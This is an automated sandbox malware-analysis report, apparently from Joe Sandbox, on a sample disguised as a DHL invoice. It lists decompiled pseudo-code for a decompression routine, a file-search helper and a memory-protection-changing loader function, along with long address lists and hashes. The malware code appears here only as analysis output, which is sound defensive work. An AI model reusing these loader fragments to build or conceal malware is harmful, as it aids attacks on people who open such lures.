							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x0040698e
0x0040698e
0x00406993
0x00406a0a
0x00406a11
0x00406a1b
0x00406ffa
0x00406ffa
0x00406ffd
0x00406ffd
0x00407003
0x00407009
0x0040700f
0x00407029
0x0040702c
0x00407032
0x0040703d
0x0040703f
0x00407011
0x00407011
0x00407020
0x00407024
0x00407024
0x00407049
0x00407070
0x00407070
0x00407076
0x00407076
0x00000000
0x0040704b
0x0040704b
0x0040704f
0x004071fe
0x00000000
0x004071fe
0x0040705b
0x00407062
0x0040706a
0x0040706d
0x00000000
0x0040706d
0x00406995
0x00406995
0x00406999
0x004069a1
0x004069a4
0x004069a6
0x004069a9
0x004069ab
0x004069b0
0x004069b3
0x004069ba
0x004069c1
0x004069c4
0x004069cf
0x004069d7
0x004069d7
0x004069d1
0x004069d1
0x004069d1
0x004069c6
0x004069c6
0x004069c6
0x004069de
0x004069fc
0x004069fe
0x00406bd1
0x00406bd1
0x00406bd4
0x00406bd7
0x00406bda
0x00406bdd
0x00406be0
0x00406be3
0x00406be6
0x00406be9
0x00406bef
0x00406c07
0x00406c0a
0x00406c0d
0x00406c10
0x00406c10
0x00406c13
0x00406c19
0x00406bf1
0x00406bf1
0x00406bf9
0x00406bfe
0x00406c00
0x00406c02
0x00406c02
0x00406c23
0x00406c26
0x00406bc9
0x00406bcf
0x00000000
0x00000000
0x00000000
0x00406c28
0x00406ba4
0x00406ba8
0x004071b0
0x00000000
0x004071b0
0x00406bae
0x00406bb1
0x00406bb4
0x00406bb8
0x00406bbb
0x00406bc1
0x00406bc3
0x00406bc3
0x00406bc6
0x00000000
0x00406bc6
0x004069e0
0x004069e0
0x004069e3
0x004069e9
0x004069eb
0x004069eb
0x004069ee
0x004069f1
0x004069f3
0x004069f4
0x004069f7
0x00406a64
0x00406a64
0x00406a68
0x00406a6b
0x00406a6e
0x00406a71
0x00406a74
0x00406a75
0x00406a78
0x00406a7a
0x00406a80
0x00406a83
0x00406a86
0x00406a89
0x00406a8c
0x00406a92
0x00406aae
0x00406ab1
0x00406ab4
0x00406ab7
0x00406abe
0x00406ac4
0x00406ac8
0x00406a94
0x00406a94
0x00406a98
0x00406aa0
0x00406aa5
0x00406aa7
0x00406aa9
0x00406aa9
0x00406ad2
0x00406ad5
0x00406a4c
0x00406a4c
0x00406a52
0x00406b05
0x00406b0b
0x00000000
0x00000000
0x00406b0d
0x00406b10
0x00406b13
0x00406b16
0x00406b19
0x00406b1c
0x00406b1f
0x00406b22
0x00406b25
0x00406b2b
0x00406b43
0x00406b46
0x00406b49
0x00406b4c
0x00406b4c
0x00406b4f
0x00406b55
0x00406b2d
0x00406b2d
0x00406b35
0x00406b3a
0x00406b3c
0x00406b3e
0x00406b3e
0x00406b5f
0x00406b62
0x00406ae0
0x00406ae4
0x004071a4
0x00000000
0x004071a4
0x00406aea
0x00406aed
0x00406af0
0x00406af4
0x00406af7
0x00406afd
0x00406aff
0x00406aff
0x00406b02
0x00406b02
0x00406b62
0x00406b69
0x00406b69
0x00406b69
0x00406b6d
0x00406b6d
0x00406b70
0x00406b73
0x00406b77
0x004071bc
0x00000000
0x004071bc
0x00406b7d
0x00406b80
0x00406b83
0x00406b86
0x00406b89
0x00406b8c
0x00406b8f
0x00406b91
0x00406b94
0x00406b97
0x00406b9a
0x00406b9c
0x00406b9c
0x00406b9c
0x00406d39
0x00406d39
0x00406d3c
0x00406d3c
0x00000000
0x00406d3c
0x00406a5e
0x00000000
0x00000000
0x00000000
0x00406adb
0x00406a27
0x00406a2b
0x00407198
0x00407214
0x0040721c
0x00407223
0x00407225
0x0040722c
0x00407230
0x00407230
0x00406a31
0x00406a34
0x00406a37
0x00406a3b
0x00406a3e
0x00406a44
0x00406a46
0x00406a46
0x00406a49
0x00000000
0x00406a49
0x00406ad5
0x004069de
0x00406812
0x00406812
0x0040681b
0x00407229
0x00407229
0x00000000
0x00407229
0x00406821
0x00000000
0x0040682c
0x00000000
0x00000000
0x00406835
0x00406838
0x0040683b
0x0040683f
0x00000000
0x00000000
0x00406845
0x00406848
0x0040684a
0x0040684b
0x0040684e
0x00406850
0x00406851
0x00406853
0x00406856
0x0040685b
0x00406860
0x00406869
0x0040687c
0x0040687f
0x0040688b
0x004068b3
0x004068b5
0x004068c3
0x004068c3
0x004068c7
0x00000000
0x00000000
0x00000000
0x00000000
0x004068b7
0x004068b7
0x004068ba
0x004068bb
0x004068bb
0x00000000
0x004068b7
0x00406891
0x00406896
0x00406896
0x0040689f
0x004068a7
0x004068aa
0x00000000
0x004068b0
0x004068b0
0x00000000
0x004068b0
0x00000000
0x004068cd
0x004068cd
0x004068d1
0x0040717d
0x00000000
0x0040717d
0x004068da
0x004068ea
0x004068ed
0x004068f0
0x004068f0
0x004068f0
0x004068f3
0x004068f7
0x00000000
0x00000000
0x004068f9
0x004068ff
0x00406929
0x0040692f
0x00406936
0x00000000
0x00406936
0x00406905
0x00406908
0x0040690d
0x0040690d
0x00406918
0x00406920
0x00406923
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406968
0x0040696e
0x00406971
0x0040697e
0x00406986
0x00000000
0x00000000
0x0040693d
0x0040693d
0x00406941
0x0040718c
0x00000000
0x0040718c
0x0040694d
0x00406958
0x00406958
0x00406958
0x0040695b
0x0040695e
0x00406961
0x00406966
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c2d
0x00406c31
0x00406c4f
0x00406c52
0x00406c59
0x00406c5c
0x00406c5f
0x00406c62
0x00406c65
0x00406c68
0x00406c6a
0x00406c71
0x00406c72
0x00406c74
0x00406c77
0x00406c7a
0x00406c7d
0x00406c7d
0x00406c82
0x00000000
0x00406c82
0x00406c33
0x00406c36
0x00406c39
0x00406c43
0x00000000
0x00000000
0x00406c97
0x00406c9b
0x00406cbe
0x00406cc1
0x00406cc4
0x00406cce
0x00406c9d
0x00406c9d
0x00406ca0
0x00406ca3
0x00406ca6
0x00406cb3
0x00406cb6
0x00406cb6
0x00000000
0x00000000
0x00406cda
0x00406cde
0x00000000
0x00000000
0x00406ce4
0x00406ce8
0x00000000
0x00000000
0x00406cee
0x00406cf0
0x00406cf4
0x00406cf4
0x00406cf7
0x00406cfb
0x00000000
0x00000000
0x00406d4b
0x00406d4f
0x00406d56
0x00406d59
0x00406d5c
0x00406d66
0x00000000
0x00406d66
0x00406d51
0x00000000
0x00000000
0x00406d72
0x00406d76
0x00406d7d
0x00406d80
0x00406d83
0x00406d78
0x00406d78
0x00406d78
0x00406d86
0x00406d89
0x00406d8c
0x00406d8c
0x00406d8f
0x00406d92
0x00406d95
0x00406d95
0x00406d98
0x00406d9f
0x00406da4
0x00000000
0x00000000
0x00406e32
0x00406e32
0x00406e36
0x004071d4
0x00000000
0x004071d4
0x00406e3c
0x00406e3f
0x00406e42
0x00406e46
0x00406e49
0x00406e4f
0x00406e51
0x00406e51
0x00406e51
0x00406e54
0x00406e57
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406eb5
0x00406eb5
0x00406eb9
0x004071e0
0x00000000
0x004071e0
0x00406ebf
0x00406ec2
0x00406ec5
0x00406ec9
0x00406ecc
0x00406ed2
0x00406ed4
0x00406ed4
0x00406ed4
0x00406ed7
0x00000000
0x00000000
0x00406c85
0x00406c85
0x00406c88
0x00000000
0x00000000
0x00406fc4
0x00406fc8
0x00406fea
0x00406fed
0x00406ff7
0x00000000
0x00406ff7
0x00406fca
0x00406fcd
0x00406fd1
0x00406fd4
0x00406fd4
0x00406fd7
0x00000000
0x00000000
0x00407081
0x00407085
0x004070a3
0x004070a3
0x004070a3
0x004070aa
0x004070b1
0x004070b8
0x004070b8
0x00000000
0x004070b8
0x00407087
0x0040708a
0x0040708d
0x00407090
0x00407097
0x00406fdb
0x00406fdb
0x00406fde
0x00000000
0x00000000
0x00407172
0x00407175
0x00000000
0x00000000
0x00406dac
0x00406dae
0x00406db5
0x00406db6
0x00406db8
0x00406dbb
0x00000000
0x00000000
0x00406dc3
0x00406dc6
0x00406dc9
0x00406dcb
0x00406dcd
0x00406dcd
0x00406dce
0x00406dd1
0x00406dd8
0x00406ddb
0x00406de9
0x00000000
0x00000000
0x004070bf
0x004070bf
0x004070c2
0x004070c9
0x00000000
0x00000000
0x004070ce
0x004070ce
0x004070d2
0x0040720a
0x00000000
0x0040720a
0x004070d8
0x004070db
0x004070de
0x004070e2
0x004070e5
0x004070eb
0x004070ed
0x004070ed
0x004070ed
0x004070f0
0x004070f3
0x004070f3
0x004070f3
0x004070f3
0x004070f6
0x004070f6
0x004070fa
0x0040715a
0x0040715d
0x00407162
0x00407163
0x00407165
0x00407167
0x0040716a
0x00000000
0x0040716a
0x004070fc
0x00407102
0x00407105
0x00407108
0x0040710b
0x0040710e
0x00407111
0x00407114
0x00407117
0x0040711a
0x0040711d
0x00407136
0x00407139
0x0040713c
0x0040713f
0x00407143
0x00407145
0x00407145
0x00407146
0x00407149
0x0040711f
0x0040711f
0x00407127
0x0040712c
0x0040712e
0x00407131
0x00407131
0x0040714c
0x00407153
0x00000000
0x00407155
0x00000000
0x00407155
0x00000000
0x00406df1
0x00406df4
0x00406e2a
0x00406f5a
0x00406f5a
0x00406f5a
0x00406f5a
0x00406f5d
0x00406f5d
0x00406f60
0x00406f62
0x004071ec
0x00000000
0x004071ec
0x00406f68
0x00406f6b
0x00000000
0x00000000
0x00406f71
0x00406f75
0x00406f78
0x00406f78
0x00406f78
0x00000000
0x00406f78
0x00406df6
0x00406df8
0x00406dfa
0x00406dfc
0x00406dff
0x00406e00
0x00406e02
0x00406e04
0x00406e07
0x00406e0a
0x00406e20
0x00406e25
0x00406e5d
0x00406e5d
0x00406e61
0x00406e8d
0x00406e8f
0x00406e96
0x00406e99
0x00406e9c
0x00406e9c
0x00406ea1
0x00406ea1
0x00406ea3
0x00406ea6
0x00406ead
0x00406eb0
0x00406edd
0x00406edd
0x00406ee0
0x00406ee3
0x00406f57
0x00406f57
0x00406f57
0x00000000
0x00406f57
0x00406ee5
0x00406eeb
0x00406eee
0x00406ef1
0x00406ef4
0x00406ef7
0x00406efa
0x00406efd
0x00406f00
0x00406f03
0x00406f06
0x00406f1f
0x00406f21
0x00406f24
0x00406f25
0x00406f28
0x00406f2a
0x00406f2d
0x00406f2f
0x00406f31
0x00406f34
0x00406f36
0x00406f39
0x00406f3d
0x00406f3f
0x00406f3f
0x00406f40
0x00406f43
0x00406f46
0x00406f08
0x00406f08
0x00406f10
0x00406f15
0x00406f17
0x00406f1a
0x00406f1a
0x00406f49
0x00406f50
0x00406eda
0x00406eda
0x00406eda
0x00406eda
0x00000000
0x00406f52
0x00000000
0x00406f52
0x00406f50
0x00406e63
0x00406e66
0x00406e68
0x00406e6b
0x00406e6e
0x00406e71
0x00406e73
0x00406e76
0x00406e79
0x00406e79
0x00406e7c
0x00406e7c
0x00406e7f
0x00406e86
0x00406e5a
0x00406e5a
0x00406e5a
0x00406e5a
0x00000000
0x00406e88
0x00000000
0x00406e88
0x00406e86
0x00406e0c
0x00406e0f
0x00406e11
0x00406e14
0x00000000
0x00000000
0x00000000
0x00000000
0x00406cfe
0x00406cfe
0x00406d02
0x004071c8
0x00000000
0x004071c8
0x00406d08
0x00406d0b
0x00406d0e
0x00406d11
0x00406d13
0x00406d13
0x00406d13
0x00406d16
0x00406d19
0x00406d1c
0x00406d1f
0x00406d22
0x00406d25
0x00406d26
0x00406d28
0x00406d28
0x00406d28
0x00406d2b
0x00406d2e
0x00406d31
0x00406d34
0x00406d34
0x00406d34
0x00406d37
0x00000000
0x00000000
0x00406f7b
0x00406f7b
0x00406f7b
0x00406f7f
0x00000000
0x00000000
0x00406f85
0x00406f88
0x00406f8b
0x00406f8e
0x00406f90
0x00406f90
0x00406f90
0x00406f93
0x00406f96
0x00406f99
0x00406f9c
0x00406f9f
0x00406fa2
0x00406fa3
0x00406fa5
0x00406fa5
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb8
0x00406fba
0x00406fbd
0x00000000
0x00406fbf
0x00000000
0x00406fbf
0x00406fbd
0x004071f2
0x00000000
0x00000000
0x00406821

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ca90ec9e464192c9522d3965182f3407f0f46d2e5c2ee50019c84c966272eaf
Instruction ID: 13591abb153405db8c483c3749d8f5c5d6ef56c483b3dbf0ce0e93ae11c78ade
Opcode Fuzzy Hash: 0ca90ec9e464192c9522d3965182f3407f0f46d2e5c2ee50019c84c966272eaf
Instruction Fuzzy Hash: 58F17871D04269CBDF18CFA8C8946ADBBB0FF44305F25856ED456BB281D3386A8ACF45

Uniqueness

Uniqueness Score: -1.00%

Function 004065C7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004065C7(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426738); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x426738;
			}

0x004065d2
0x004065db
0x00000000
0x004065e8
0x004065de
0x00000000

APIs

FindFirstFileW.KERNELBASE(?,00426738,00425EF0,00405CAA,00425EF0,00425EF0,00000000,00425EF0,00425EF0,?,?,75F73420,004059B6,?,C:\Users\user\AppData\Local\Temp\,75F73420), ref: 004065D2
FindClose.KERNEL32(00000000), ref: 004065DE

Strings

8gB, xrefs: 004065C8

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: 8gB
API String ID: 2295610775-1733800166
Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
Instruction ID: 17231fcebe31093dbb05a9ce9100934524038fc54cbd693a8662f86860803725
Opcode Fuzzy Hash: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
Instruction Fuzzy Hash: 46D012315450206BC60517387D0C84BBA589F653357128A37F466F51E4C734CC628698

Uniqueness

Uniqueness Score: -1.00%

Function 03293AE1 Relevance: 3.3, Strings: 2, Instructions: 788COMMON

Download Yara Rule

Strings

LqZ, xrefs: 03293CB8
- , xrefs: 03294815

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID: LqZ$-
API String ID: 2706961497-2093572842
Opcode ID: d8f0f2fa79aa6aa645e5f4775a4d3acc119df6f2bea7752cfea40c499e7ad0fd
Instruction ID: 39fd7a9449341ba5dca149eb4ea86f77b08b82207ff4a3a790f29a0851b39f61
Opcode Fuzzy Hash: d8f0f2fa79aa6aa645e5f4775a4d3acc119df6f2bea7752cfea40c499e7ad0fd
Instruction Fuzzy Hash: 77625D305183868FDF35DF38C8947DA7BA2AF52350F4982AECC998F296D3718586C712

Uniqueness

Uniqueness Score: -1.00%

Function 74112A74 Relevance: 3.2, APIs: 2, Instructions: 156
nativeCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E74112A74(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t31;
				void* _t32;
				long _t36;
				void* _t40;
				void* _t49;
				void* _t54;
				void* _t58;
				signed int _t65;
				void* _t70;
				void* _t79;
				intOrPtr _t81;
				signed int _t88;
				intOrPtr _t90;
				intOrPtr _t91;
				void* _t92;
				void* _t94;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				intOrPtr _t106;
				intOrPtr _t107;

				if( *0x74114050 != 0 && E741129F3(_a4) == 0) {
					 *0x74114054 = _t106;
					if( *0x7411404c != 0) {
						_t106 =  *0x7411404c;
					} else {
						E74112FD0(E741129ED(), __ecx);
						 *0x7411404c = _t106;
					}
				}
				_t31 = E74112A2F(_a4);
				_t107 = _t106 + 4;
				if(_t31 <= 0) {
					L9:
					_t32 = E74112A23();
					_t81 = _a4;
					_t90 =  *0x74114058;
					 *((intOrPtr*)(_t32 + _t81)) = _t90;
					 *0x74114058 = _t81;
					E74112A1D();
					_t36 = NtProtectVirtualMemory(??, ??, ??, ??, ??); // executed
					 *0x74114034 = _t36;
					 *0x74114038 = _t90;
					if( *0x74114050 != 0 && E741129F3( *0x74114058) == 0) {
						 *0x7411404c = _t107;
						_t107 =  *0x74114054;
					}
					_t91 =  *0x74114058;
					_a4 = _t91;
					 *0x74114058 =  *((intOrPtr*)(E74112A23() + _t91));
					_t40 = E74112A01(_t91);
					_pop(_t92);
					if(_t40 != 0) {
						_t49 = E74112A2F(_t92);
						if(_t49 > 0) {
							_push(_t49);
							_push(E74112A3A() + _a4 + _v8);
							_push(E74112A44());
							if( *0x74114050 <= 0 || E741129F3(_a4) != 0) {
								_pop(_t101);
								_pop(_t54);
								if( *((intOrPtr*)(_t101 + _t54)) == 2) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t102);
								_pop(_t58);
								 *0x7411404c =  *0x7411404c +  *(_t102 + _t58) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					if( *0x74114058 == 0) {
						 *0x7411404c = 0;
					}
					_t94 = _a4 + E74112A3A();
					 *(E74112A48() + _t94) =  *0x74114034;
					 *((intOrPtr*)(E74112A4C() + _t94)) =  *0x74114038;
					E74112A5C(_a4);
					if(E74112A0F() != 0) {
						 *0x74114068 = GetLastError();
					}
					return _a4;
				}
				_push(E74112A3A() + _a4);
				_t65 = E74112A40();
				_v8 = _t65;
				_t88 = _t31;
				_push(_t77 + _t65 * _t88);
				_t79 = E74112A4C();
				_t100 = E74112A48();
				_t103 = E74112A44();
				_t70 = _t88;
				if( *((intOrPtr*)(_t103 + _t70)) == 2) {
					_push( *((intOrPtr*)(_t79 + _t70)));
				}
				_push( *((intOrPtr*)(_t100 + _t70)));
				asm("loop 0xfffffff1");
				goto L9;
			}

0x74112a84
0x74112a95
0x74112aa2
0x74112ab6
0x74112aa4
0x74112aa9
0x74112aae
0x74112aae
0x74112aa2
0x74112abf
0x74112ac4
0x74112aca
0x74112b0e
0x74112b0e
0x74112b13
0x74112b18
0x74112b1e
0x74112b20
0x74112b26
0x74112b33
0x74112b35
0x74112b3a
0x74112b47
0x74112b5a
0x74112b60
0x74112b66
0x74112b67
0x74112b6d
0x74112b79
0x74112b7f
0x74112b87
0x74112b88
0x74112b8b
0x74112b96
0x74112b98
0x74112ba4
0x74112baa
0x74112bb2
0x74112bde
0x74112bdf
0x74112be5
0x74112be5
0x74112bec
0x74112bc2
0x74112bc2
0x74112bc3
0x74112bd1
0x74112bda
0x74112bda
0x74112bb2
0x74112b96
0x74112bf5
0x74112bf7
0x74112bf7
0x74112c09
0x74112c16
0x74112c24
0x74112c2a
0x74112c38
0x74112c40
0x74112c40
0x74112c4e
0x74112c4e
0x74112ad5
0x74112ad6
0x74112adb
0x74112adf
0x74112ae4
0x74112af8
0x74112af9
0x74112afa
0x74112afc
0x74112b01
0x74112b03
0x74112b03
0x74112b06
0x74112b0c
0x00000000

APIs

NtProtectVirtualMemory.NTDLL(00000000), ref: 74112B33
GetLastError.KERNEL32 ref: 74112C3A

Memory Dump Source

Source File: 00000001.00000002.18002086592.0000000074111000.00000020.00000001.01000000.00000004.sdmp, Offset: 74110000, based on PE: true

Associated: 00000001.00000002.18002024165.0000000074110000.00000002.00000001.01000000.00000004.sdmpDownload File
